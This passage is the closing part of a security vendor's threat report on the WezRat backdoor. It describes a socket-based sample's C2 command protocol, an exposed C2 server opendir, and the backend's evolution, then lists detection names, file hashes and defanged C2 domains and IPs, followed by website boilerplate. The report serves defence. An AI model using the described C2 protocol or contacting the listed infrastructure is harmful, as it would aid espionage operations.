Upon connecting to the C2 server, the malware sends it the
string Init<sep>Windows and expects any response other than No. The server can
then respond with the following string [command id]<sep>[command to execute].
Similarly to WezRAT, if the operator forgets how to run commands, the sample
responds with the string cmd.exe /c <your command>.
Figure 10 – Command execution by the socket-based sample.
The sudden shift to such a simple tool is unclear to us. As we have never
observed these samples used in the wild, we can only speculate whether these are
tests of a new approach or attempts to overcome detections in specific
environments.
A SNEAK PEEK INTO THE C2
Figure 11 – Opendir on WezRat C2 server.
In late 2023, one of the WezRat C2 servers, 46.249.58[.]136, contained an
opendir that provided visibility into the inner workings and source code of the
WezRat’s backend and its panel UI for operators:
Figure 12 – Contents of /commandPage.html showing the operator’s UI for old
versions of WezRat.
Figure 13- A simple UI to run a command for a specific machine.
The backend code used to be written in JavaScript, specifically for Node.js, and
all data is stored and manipulated in MySQL database:
Figure 14- Part of the initialization code on the C2 server
Figure 15 – Part of the C2 backend code.
It’s likely that after the source code was “leaked” the threat actors needed to
rewrite it. Over time, we observe changes in API Endpoints. Based on the
characteristics of C2 servers in the newer versions, the backend of WezRat moved
to Kestrel around March 2024.
Due to specific error handling in the backdoor code, hints on how to run
commands correctly, and the overall UI of the panel, we suspect there are at
least two teams behind this campaign: one in charge of the development and the
other is in charge of operating the backdoor.
CONCLUSION
In this article, we analyzed the modules and the evolution of the WezRat
backdoor, which has been used by Emennet Pasargad for over a year as reported by
the IC3 advisory. Recent versions of WezRat feature a stealthier operation mode,
achieved by dividing the backdoor into separate modules DLLs. Additionally, the
backdoor has gained more infostealer functions.
The ongoing development and refinement of WezRat indicates a dedicated
investment in maintaining a versatile and evasive tool for cyber espionage.
Emennet Pasargad’s activities target various entities across the United States,
Europe, and the Middle East, posing a threat not only to direct political
adversaries but also to any group or individual with influence over Iran’s
international or domestic narrative.
PROTECTIONS
Check Point Threat Emulation and Harmony Endpoint provide comprehensive coverage
of attack tactics, file-types, and operating systems and protect against the
type of attacks and threats described in this report.
Harmony Endpoint
* Behavioral.Win.FakeChrome.B
Threat Emulation
* Trojan.Wins.FakeUpdater.A
IOCS
SHA256
66b08e55d11f49493118e8a6cab1bb5f1953b2a4784a38c64cf7ed02bf781713
53055662aeca79a319c8c59194f25bae1b33eab1a39cf18e8daa3602fbca900e
b96fad26fba197302fd11e1771e996387b7b23c2560e08f20c69069e173c7fa7
2cf3cd8b7df4e87ac17812511510a48be4a9546fed513b9204c7173364db7ae3
cf12b2043a05729839a29ff4bd23b4088888da1153ca81040a6c048417254a36
26f66196c463e6ec1f224d9f87c1f75d868c94bba5c8502b6cbe806e06614377
e37b95bb9bee64cc0313eaad8a0269493745f89413bd78b58bb3b479b36084ae
84366a894120d4a8c83411925ef04de52fa56da6fad0023a71f71a9bf21259ad
4431b2a4d7758907f81fb1a0c1e36b2ce03e08d43123b1c398487770afd20727
e1a5696dcae33657fd0aa2d1e7a36b84c4647975dab3063ac2f42c19dae0a5a1
5c03ac7128fb6e8ad923897e3696e08c943f4c819e5c1bdbe3df2b5774692d3d
5e33c4a38c05f52918ffd4e49fd2d1b1a771010466ceb19eaf378daa02f71700
898595a6646b94f9735442ae65deb5f5364eddf2a7008f66e9d7ee8b6c08c285
629dc03888412ae39d50cc17d5cbe579f2a99be03e6af2f071e68b7226f891d0
48a97f6aee23543909fc1b7341dff8aa0f1caba229d61d3b0de4e03df02b1ac0
SERVERS
il-cert[.]net
connect.il-cert[.]net
onlinelive[.]info
45.143.167[.]87
194.11.226[.]9
45.120.177[.]8
194.4.49[.]175
46.249.58[.]136
GO UP
BACK TO ALL POSTS
POPULAR POSTS
* Artificial Intelligence
* ChatGPT
* Check Point Research Publications
OPWNAI : Cybercriminals Starting to Use ChatGPT
* Check Point Research Publications
* Threat Research
Hacking Fortnite Accounts
* Artificial Intelligence
* ChatGPT
* Check Point Research Publications
OpwnAI: AI That Can Save the Day or HACK it Away
BLOGS AND PUBLICATIONS
* Check Point Research Publications
August 11, 2017
“THE NEXT WANNACRY” VULNERABILITY IS HERE
* Check Point Research Publications
January 11, 2018
‘RUBYMINER’ CRYPTOMINER AFFECTS 30% OF WW NETWORKS
* Check Point Research Publications
* Global Cyber Attack Reports
* Threat Research
February 17, 2020
“THE TURKISH RAT” EVOLVED ADWIND IN A MASSIVE ONGOING PHISHING CAMPAIGN
* Check Point Research Publications
August 11, 2017
“THE NEXT WANNACRY” VULNERABILITY IS HERE
* Check Point Research Publications
January 11, 2018
‘RUBYMINER’ CRYPTOMINER AFFECTS 30% OF WW NETWORKS
* Check Point Research Publications
* Global Cyber Attack Reports
* Threat Research
February 17, 2020
“THE TURKISH RAT” EVOLVED ADWIND IN A MASSIVE ONGOING PHISHING CAMPAIGN
* Check Point Research Publications
August 11, 2017
“THE NEXT WANNACRY” VULNERABILITY IS HERE
* 1
* 2
* 3
* Publications
* Global cyber attack reports
* Research publications
* IPS advisories
* Check point blog
* Demos
* Tools
* Sandblast file analysis
* ThreatCloud
* Threat Intelligence
* Zero day protection
* Live threat map
* About Us
* Contact Us
LET’S GET IN TOUCH
Subscribe for cpr blogs, news and more
Subscribe Now
© 1994-2024 Check Point Software Technologies LTD. All rights reserved.
Property of CheckPoint.com
Privacy Policy
SUBSCRIBE TO CYBER INTELLIGENCE REPORTS
First Name
Last Name
Country—Please choose an option—ChinaIndiaUnited
StatesIndonesiaBrazilPakistanNigeriaBangladeshRussiaJapanMexicoPhilippinesVietnamEthiopiaEgyptGermanyIranTurkeyDemocratic
Republic of the CongoThailandFranceUnited KingdomItalyBurmaSouth AfricaSouth
KoreaColombiaSpainUkraineTanzaniaKenyaArgentinaAlgeriaPolandSudanUgandaCanadaIraqMoroccoPeruUzbekistanSaudi
ArabiaMalaysiaVenezuelaNepalAfghanistanYemenNorth
KoreaGhanaMozambiqueTaiwanAustraliaIvory CoastSyriaMadagascarAngolaCameroonSri
LankaRomaniaBurkina
FasoNigerKazakhstanNetherlandsChileMalawiEcuadorGuatemalaMaliCambodiaSenegalZambiaZimbabweChadSouth
SudanBelgiumCubaTunisiaGuineaGreecePortugalRwandaCzech
RepublicSomaliaHaitiBeninBurundiBoliviaHungarySwedenBelarusDominican
RepublicAzerbaijanHondurasAustriaUnited Arab
EmiratesIsraelSwitzerlandTajikistanBulgariaHong Kong (China)SerbiaPapua New
GuineaParaguayLaosJordanEl SalvadorEritreaLibyaTogoSierra
LeoneNicaraguaKyrgyzstanDenmarkFinlandSlovakiaSingaporeTurkmenistanNorwayLebanonCosta
RicaCentral African RepublicIrelandGeorgiaNew ZealandRepublic of the
CongoPalestineLiberiaCroatiaOmanBosnia and HerzegovinaPuerto
RicoKuwaitMoldovMauritaniaPanamaUruguayArmeniaLithuaniaAlbaniaMongoliaJamaicaNamibiaLesothoQatarMacedoniaSloveniaBotswanaLatviaGambiaKosovoGuinea-BissauGabonEquatorial
GuineaTrinidad and
TobagoEstoniaMauritiusSwazilandBahrainTimor-LesteDjiboutiCyprusFijiReunion
(France)GuyanaComorosBhutanMontenegroMacau (China)Solomon IslandsWestern
SaharaLuxembourgSurinameCape VerdeMaltaGuadeloupe (France)Martinique
(France)BruneiBahamasIcelandMaldivesBelizeBarbadosFrench Polynesia
(France)VanuatuNew Caledonia (France)French Guiana (France)Mayotte
(France)SamoaSao Tom and PrincipeSaint LuciaGuam (USA)Curacao (Netherlands)Saint
Vincent and the GrenadinesKiribatiUnited States Virgin Islands
(USA)GrenadaTongaAruba (Netherlands)Federated States of MicronesiaJersey
(UK)SeychellesAntigua and BarbudaIsle of Man (UK)AndorraDominicaBermuda
(UK)Guernsey (UK)Greenland (Denmark)Marshall IslandsAmerican Samoa (USA)Cayman
Islands (UK)Saint Kitts and NevisNorthern Mariana Islands (USA)Faroe Islands
(Denmark)Sint Maarten (Netherlands)Saint Martin (France)LiechtensteinMonacoSan
MarinoTurks and Caicos Islands (UK)Gibraltar (UK)British Virgin Islands
(UK)Aland Islands (Finland)Caribbean Netherlands (Netherlands)PalauCook Islands
(NZ)Anguilla (UK)Wallis and Futuna (France)TuvaluNauruSaint Barthelemy
(France)Saint Pierre and Miquelon (France)Montserrat (UK)Saint Helena, Ascension
and Tristan da Cunha (UK)Svalbard and Jan Mayen (Norway)Falkland Islands
(UK)Norfolk Island (Australia)Christmas Island (Australia)Niue (NZ)Tokelau
(NZ)Vatican CityCocos (Keeling) Islands (Australia)Pitcairn Islands (UK)
Email
WE VALUE YOUR PRIVACY!
BFSI uses cookies on this site. We use cookies to enable faster and easier
experience for you. By continuing to visit this website you agree to our use of
cookies.
ACCEPT
REJECT
This website uses cookies in order to optimize your user experience as well as
for advertising and analytics. For further information, please read our Privacy
Policy and ourCookie Notice.
DISMISS
Manage Preferences
404 Not Found
404 NOT FOUND
--------------------------------------------------------------------------------
nginx
When you visit any website, it may store or retrieve information on your
browser, mostly in the form of cookies. This information might be about you,
your preferences or your device and is mostly used to make the site work as you
expect it to. The information does not usually directly identify you, but it can
give you a more personalized web experience. Because we respect your right to
privacy, you can choose not to allow some types of cookies. Click on the
different category headings to find out more and change our default settings.
However, blocking some types of cookies may impact your experience of the site
and the services we are able to offer.
More information
Allow All
MANAGE CONSENT PREFERENCES
FUNCTIONAL COOKIES
Functional Cookies
These cookies enable the website to provide enhanced functionality and
personalisation. They may be set by us or by third party providers whose
services we have added to our pages. If you do not allow these cookies then some
or all of these services may not function properly.
STRICTLY NECESSARY COOKIES
Always Active
These cookies are necessary for the website to function and cannot be switched
off in our systems. They are usually only set in response to actions made by you
which amount to a request for services, such as setting your privacy
preferences, logging in or filling in forms. You can set your browser to block
or alert you about these cookies, but some parts of the site will not then work.
These cookies do not store any personally identifiable information.
PERFORMANCE COOKIES
Performance Cookies
These cookies allow us to count visits and traffic sources so we can measure and
improve the performance of our site. They help us to know which pages are the
most and least popular and see how visitors move around the site. All
information these cookies collect is aggregated and therefore anonymous. If you
do not allow these cookies we will not know when you have visited our site, and
will not be able to monitor its performance.
TARGETING COOKIES
Targeting Cookies
These cookies may be set through our site by our advertising partners. They may
be used by those companies to build a profile of your interests and show you
relevant adverts on other sites. They do not store directly personal
information, but are based on uniquely identifying your browser and internet
device. If you do not allow these cookies, you will experience less targeted
advertising.
Back Button
PERFORMANCE COOKIES
Search Icon
Filter Icon
Clear
checkbox label label
Apply Cancel
Consent Leg.Interest
checkbox label label
checkbox label label
checkbox label label
Reject All Confirm My Choices